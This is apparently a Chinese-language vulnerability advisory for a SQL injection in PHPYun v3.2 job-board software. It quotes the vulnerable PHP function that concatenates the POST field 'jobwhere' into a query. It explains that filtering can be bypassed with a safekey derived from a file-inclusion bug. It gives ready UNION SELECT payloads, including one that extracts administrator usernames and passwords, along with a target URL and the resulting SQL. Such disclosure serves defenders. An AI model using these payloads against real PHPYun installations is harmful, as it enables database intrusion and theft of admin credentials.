PHPYun v3.2 /model/ajax.class.php SQL注入漏洞

<ul><li>/model/index.class.php</li></ul><pre class="">function exchanges_action(){ $_GET['page']=$_POST['page']; $where=$_POST['jobwhere']." ORDER BY `lastupdate` DESC"; $urlarr['page']="{{page}}"; $pageurl=$this-&gt;url("index","index",$urlarr); $rows=$this-&gt;get_page("company_job",$where,$pageurl,6,"`id`,`name`,`uid`,`salary`,`edu`,`lastupdate`"); if($rows&amp;&amp;is_array($rows)){ </pre><p>jobwhere带入SQL语句中，可以根据文件包含漏洞计算出safekey然后绕过过滤导致注入。</p><p>当用户传入：</p><pre class="">jobwhere=1=2 union select/**/1,user(),3,4,5,6#&amp;safekey=5f413c6ca895a192144c0182fc87af26</pre><p>执行的SQL语句为：</p><pre class="">SELECT `id`,`name`,`uid`,`salary`,`edu`,`lastupdate` FROM `phpyun_company_job` WHERE 1=2 union select/**/1,user(),3,4,5,6# ORDER BY `lastupdate` DESC limit 0,6</pre><p>页面返回：&nbsp;</p><p><img alt="D5FAFC8D-EC34-4406-A277-1CAA19382750.png" src="https://images.seebug.org/@/uploads/1434693827503-D5FAFC8D-EC34-4406-A277-1CAA19382750.png" data-image-size="287,118"><br></p><p>POST内容：</p><pre class="">jobwhere=1=2 union select/**/1,concat(username,0x3a,password),3,4,5,6 from phpyun_admin_user#&amp;safekey=5f413c6ca895a192144c0182fc87af26</pre><p>到地址：</p><pre class="">http://10.211.55.3/phpyun/index.php/admin/?m=ajax&amp;c=exchanges</pre><p>得到管理员帐号密码：&nbsp;</p><p><img alt="76CFD450-6F9F-4EB0-9408-5594B967F642.png" src="https://images.seebug.org/@/uploads/1434693882529-76CFD450-6F9F-4EB0-9408-5594B967F642.png" data-image-size="549,94"><br></p>